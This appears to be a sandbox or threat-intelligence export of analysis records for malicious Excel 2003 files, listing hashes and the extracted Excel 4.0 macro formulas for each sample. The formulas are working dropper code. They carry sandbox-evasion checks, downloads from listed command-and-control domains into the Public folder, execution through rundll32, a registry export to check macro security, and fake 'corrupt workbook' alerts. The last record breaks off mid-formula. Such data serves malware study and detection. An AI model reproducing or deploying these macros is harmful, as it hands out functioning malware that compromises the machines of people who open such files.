{"version":"0.2","sample":{"sample":"","kind":"file","target":"5bb3f2e36cea311c446c40d964a2caf29112a8ae7e92f562eac92815cc9cf3d7"},"analysis":{"reported":"2020-04-09T16:16:30Z","score":10},"files":[{"filename":"5bb3f2e36cea311c446c40d964a2caf29112a8ae7e92f562eac92815cc9cf3d7","filesize":170496,"md5":"207b38d4d8e0ac7928bb7d90fff93126","sha1":"81ae50f3d083a7495f54c3aad2584e0c73aff08b","sha256":"5bb3f2e36cea311c446c40d964a2caf29112a8ae7e92f562eac92815cc9cf3d7","sha512":"b987a5a8a552883e0329270303bc12cf1a593bb94afe614c1da0f0401636efd21bd5a51c1bfe23b1fa11cc66d1a57ee4c6101a910d320061cbb5af17d971d96e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5bb3f2e36cea311c446c40d964a2caf29112a8ae7e92f562eac92815cc9cf3d7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CawJzK6xK1\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5bbd7490363ba6f3ce19b70d901e363c0a53449acfafc8f88bba07dc6dbc1942"},"analysis":{"reported":"2020-04-09T16:16:30Z","score":10},"files":[{"filename":"5bbd7490363ba6f3ce19b70d901e363c0a53449acfafc8f88bba07dc6dbc1942","filesize":177152,"md5":"6b4825b99fae663944d34ee275850636","sha1":"cfbed455911e5fb0f0a3e92508ad66f4790dc8f0","sha256":"5bbd7490363ba6f3ce19b70d901e363c0a53449acfafc8f88bba07dc6dbc1942","sha512":"5c8eb1f62c673ed4d6d4994c8c6214effadf516516ee18fccd3685d4eb2e831d23c78319658110367777bcd27178015df7be0de4dc93fa9e962085c420e8b8c0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5bbd7490363ba6f3ce19b70d901e363c0a53449acfafc8f88bba07dc6dbc1942.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"aO0ai8s8Ri\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5bcc54049248b0ef8ee408e06bf964b62a90275fab5548a4ffe101662b6ea83d"},"analysis":{"reported":"2020-04-09T16:16:30Z","score":10},"files":[{"filename":"5bcc54049248b0ef8ee408e06bf964b62a90275fab5548a4ffe101662b6ea83d","filesize":168448,"md5":"ee759324fb75f6794078104412348515","sha1":"1ced92d2ba2e47dd21fbcc973f26957c73e7fd71","sha256":"5bcc54049248b0ef8ee408e06bf964b62a90275fab5548a4ffe101662b6ea83d","sha512":"8ef13801f367ad2891872dd9e6e26bae06f5b8548c2ae4914c58a959199b3913ad50f89df779c186a204459e82c143854e8477b072c99cf78edb6387eb1ee6f1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5bcc54049248b0ef8ee408e06bf964b62a90275fab5548a4ffe101662b6ea83d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yvtCvNeiJh\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5bd254f989e2786e232017cbb19f9f314c816e56277ec090c67a2ac35c05aa7a"},"analysis":{"reported":"2020-04-09T16:16:30Z","score":10},"files":[{"filename":"5bd254f989e2786e232017cbb19f9f314c816e56277ec090c67a2ac35c05aa7a","filesize":185344,"md5":"bfdf7b12c4d25475dcbd1334ef27afd4","sha1":"f5a32c40bf108ff27fae50bfbfa76fb8acea5ba5","sha256":"5bd254f989e2786e232017cbb19f9f314c816e56277ec090c67a2ac35c05aa7a","sha512":"b5b2334abed3da76db2b71f9b42d3a9a96f44d1394a27b30fbcabe22988e71ecbe0eeb428e369be128fae0cfc1ea0f895a3a3d306a07a058a9c20e51975b8393","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5bd254f989e2786e232017cbb19f9f314c816e56277ec090c67a2ac35c05aa7a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5bfb533510bd389124a6f2fbb62aa9396abb3638b2ce4e5d5248ce4a39276407"},"analysis":{"reported":"2020-04-09T16:16:30Z","score":10},"files":[{"filename":"5bfb533510bd389124a6f2fbb62aa9396abb3638b2ce4e5d5248ce4a39276407","filesize":209920,"md5":"74da9594ce45eb9b4ee941d46562ef62","sha1":"1afad8747b0090c3ed9c09cb457adb8f7571ed40","sha256":"5bfb533510bd389124a6f2fbb62aa9396abb3638b2ce4e5d5248ce4a39276407","sha512":"9a7fcc831e2299d7ae0636125935cc4426d9759422bdd4dd285a5c90d5339818703b18308a973f94cc4f68bde713903967857d339fb7b3427fe7fe3dea684dc5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5bfb533510bd389124a6f2fbb62aa9396abb3638b2ce4e5d5248ce4a39276407.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"pZ2nLZX1r2\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5bfca85aa960fd28880f61dd5246d017d7f2cc3eddd4cf26ace66c9cefdc7bdd"},"analysis":{"reported":"2020-04-09T16:16:30Z","score":10},"files":[{"filename":"5bfca85aa960fd28880f61dd5246d017d7f2cc3eddd4cf26ace66c9cefdc7bdd","filesize":116224,"md5":"563ff81e3fdd4574d66794657446a06f","sha1":"dd664ba15343853f11c02932944828cbc0430119","sha256":"5bfca85aa960fd28880f61dd5246d017d7f2cc3eddd4cf26ace66c9cefdc7bdd","sha512":"42dcc818b381a1f6a9f642aa4bf811d006ff19a2c824168ab520cc4d1ca33b8ca144bb0a3c3b3b71a2bbe28dfb1ce0e9156c60b8e9e9c2188e958da0c981c4f7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5bfca85aa960fd28880f61dd5246d017d7f2cc3eddd4cf26ace66c9cefdc7bdd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"M5TO8eIOJ5\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5c354b004e0820a5c4de578e0c0b25be6dbbf52211ebb973465b9b3c567c9f88"},"analysis":{"reported":"2020-04-09T16:16:30Z","score":10},"files":[{"filename":"5c354b004e0820a5c4de578e0c0b25be6dbbf52211ebb973465b9b3c567c9f88","filesize":113664,"md5":"ae08dfff53c4d4cbccc983a7a7ce8afa","sha1":"b4b43935961b404e7552d1827ccc9e985730efea","sha256":"5c354b004e0820a5c4de578e0c0b25be6dbbf52211ebb973465b9b3c567c9f88","sha512":"03f81636ff1a112d60236d47e52d1d445d89fdfdc9ab05c0a130bff212ab0b30b00844c1f9935e4887a2f869d135fe0630c79b2877a869d959ee923e3b961d4b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5c354b004e0820a5c4de578e0c0b25be6dbbf52211ebb973465b9b3c567c9f88.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8KpQIDWyyK\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5c374338c1bc1f28f430ff486e9ae786df389914592d5b0d4ad3832445804231"},"analysis":{"reported":"2020-04-09T16:16:30Z","score":10},"files":[{"filename":"5c374338c1bc1f28f430ff486e9ae786df389914592d5b0d4ad3832445804231","filesize":171008,"md5":"53d87bf9c4a083cd3ca8607944f44633","sha1":"37e96655037d5d69f0a459d8859d7c8aa1743110","sha256":"5c374338c1bc1f28f430ff486e9ae786df389914592d5b0d4ad3832445804231","sha512":"b04d70367fe2098246a9efbf782f74ab9b455d8d35977ea0ae131391680723fe271ac87c14d53a440644c6e2ff7f4253a1726099fbd143a9e9846ea43fe490a4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5c374338c1bc1f28f430ff486e9ae786df389914592d5b0d4ad3832445804231.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"sffQuoSLHx\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5c38e2dccacaefc7adcbea0dc5b69abfe06a12383b23883bb9c60854a03ca7bb"},"analysis":{"reported":"2020-04-09T16:16:30Z","score":10},"files":[{"filename":"5c38e2dccacaefc7adcbea0dc5b69abfe06a12383b23883bb9c60854a03ca7bb","filesize":221184,"md5":"6abf68da358dc9c1a5716f5aa3154611","sha1":"c4b5f448697d7ad337c0ab9c0a0fc645dc3788ab","sha256":"5c38e2dccacaefc7adcbea0dc5b69abfe06a12383b23883bb9c60854a03ca7bb","sha512":"b2ea418c96a9b58c69c9b0ef86a8218ae0ab68f59a509d92560ea4f7d4cabe1dd38bcb106ab6b04e26a238402e6bc0479a0b4ad87ada80460d508b3ce9c8d72d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5c38e2dccacaefc7adcbea0dc5b69abfe06a12383b23883bb9c60854a03ca7bb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rLGnw5V5FM\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5c571c032e11436da6338fc6435bf8ed69762287083fe5e2e673f5ad16a202b8"},"analysis":{"reported":"2020-04-09T16:16:30Z","score":10},"files":[{"filename":"5c571c032e11436da6338fc6435bf8ed69762287083fe5e2e673f5ad16a202b8","filesize":171008,"md5":"02ba245372694870aa15416fbb8b450a","sha1":"892122960b63ce7491141b7657e2bcf557b27f96","sha256":"5c571c032e11436da6338fc6435bf8ed69762287083fe5e2e673f5ad16a202b8","sha512":"64bb3dbb27418f821781cd6e5912fd3d56137ae642a0c89b3e8850840f59191633c1da171bd125829559e16aa122aa5fd60bb2c18868b8ed19401c7cf941388f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5c571c032e11436da6338fc6435bf8ed69762287083fe5e2e673f5ad16a202b8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"roVFZ4pL64\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5c6feebda4deb669b926bff90ebc0d7155f3bef31f152f2a3bbc472e6a38d7aa"},"analysis":{"reported":"2020-04-09T16:16:30Z","score":10},"files":[{"filename":"5c6feebda4deb669b926bff90ebc0d7155f3bef31f152f2a3bbc472e6a38d7aa","filesize":209408,"md5":"bbd4e9053bb6a3be41d61b3eb522735a","sha1":"3e994c2292c94731a3c71ffba4802ad939e173c6","sha256":"5c6feebda4deb669b926bff90ebc0d7155f3bef31f152f2a3bbc472e6a38d7aa","sha512":"418ce60e4c0e43d64408f703e0c369e053b98e773a45edd36f6e87967c641dc1e14b22aac89d4a8fc0e18b49ac3bfc35d89353225c9c1c853e00e5fcc572f57a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5c6feebda4deb669b926bff90ebc0d7155f3bef31f152f2a3bbc472e6a38d7aa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Xy4dLwak1I\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5c7157efcbb3e3f2b9712994868fbe80d79519590cfbb1769938e4df8e5c3619"},"analysis":{"reported":"2020-04-09T16:16:30Z","score":10},"files":[{"filename":"5c7157efcbb3e3f2b9712994868fbe80d79519590cfbb1769938e4df8e5c3619","filesize":112640,"md5":"0f243085bde1a326d1b1c981a82f541e","sha1":"17a31d90b07bff087858545912ae72ba9a5f7e7e","sha256":"5c7157efcbb3e3f2b9712994868fbe80d79519590cfbb1769938e4df8e5c3619","sha512":"4c9ea5001083469a7d7f0a8f0facfc8eb55bd7fcb411daccb2bcede114620a6264df8d18a17c5392d30c6550a3175544ce720ef4120609c0fe4ee44cc870fbd3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5c7157efcbb3e3f2b9712994868fbe80d79519590cfbb1769938e4df8e5c3619.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5c72b75636687035ac6cb13cf37cc6b8858ccd6100e77cd4b4644517ea05e9c6"},"analysis":{"reported":"2020-04-09T16:16:30Z","score":10},"files":[{"filename":"5c72b75636687035ac6cb13cf37cc6b8858ccd6100e77cd4b4644517ea05e9c6","filesize":185344,"md5":"69c2be75aeb4ae24c0bbc542a6df480d","sha1":"11bbc5d68e133be1419f8d39b0a0352803f0cec3","sha256":"5c72b75636687035ac6cb13cf37cc6b8858ccd6100e77cd4b4644517ea05e9c6","sha512":"81e0ab2b84e36e90e4af6976332c0dec6f24b08aea8a1e26552403c5989d36c77a22876baf0fb78882aef88f7f68de244dae0824b613f98ee2460164b74f40f4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5c72b75636687035ac6cb13cf37cc6b8858ccd6100e77cd4b4644517ea05e9c6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5c79f5cfe711e5503486c2396c1b7305670a6e422b67f17a17919055a7be3fba"},"analysis":{"reported":"2020-04-09T16:16:30Z","score":10},"files":[{"filename":"5c79f5cfe711e5503486c2396c1b7305670a6e422b67f17a17919055a7be3fba","filesize":168960,"md5":"e510216732509e58eac431fc36df862b","sha1":"3779292ebccb4c423ecb774c551dfd3d5f83fea4","sha256":"5c79f5cfe711e5503486c2396c1b7305670a6e422b67f17a17919055a7be3fba","sha512":"218cc7ce863d57944ac8e6499d3bcd09d975658f7f5c83c5bb9bf422c3beb0ad60026fde300f9be4214be2c59bef41531a0d2f11bd8bedb7dc8593cf1e56e2c7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5c79f5cfe711e5503486c2396c1b7305670a6e422b67f17a17919055a7be3fba.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CbXgFv2ugx\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5c96aabbe4bf05b58cf915b22159230236d569db523d162aea5ab6dd66aa39d5"},"analysis":{"reported":"2020-04-09T16:16:30Z","score":10},"files":[{"filename":"5c96aabbe4bf05b58cf915b22159230236d569db523d162aea5ab6dd66aa39d5","filesize":209920,"md5":"51e435dcbb43f8d30fb018f6c59aff3c","sha1":"1d597dbefc98b5594722c7ffa0c134219506c868","sha256":"5c96aabbe4bf05b58cf915b22159230236d569db523d162aea5ab6dd66aa39d5","sha512":"8ccfa656b1ff111d389a4e3c207d2b103ce72f10c8804944c1bd187fd05794355fc5607d57aae7cfdf31c9930f5a7f099b1cf528b4263470671e0dcf3ae0dd19","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5c96aabbe4bf05b58cf915b22159230236d569db523d162aea5ab6dd66aa39d5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 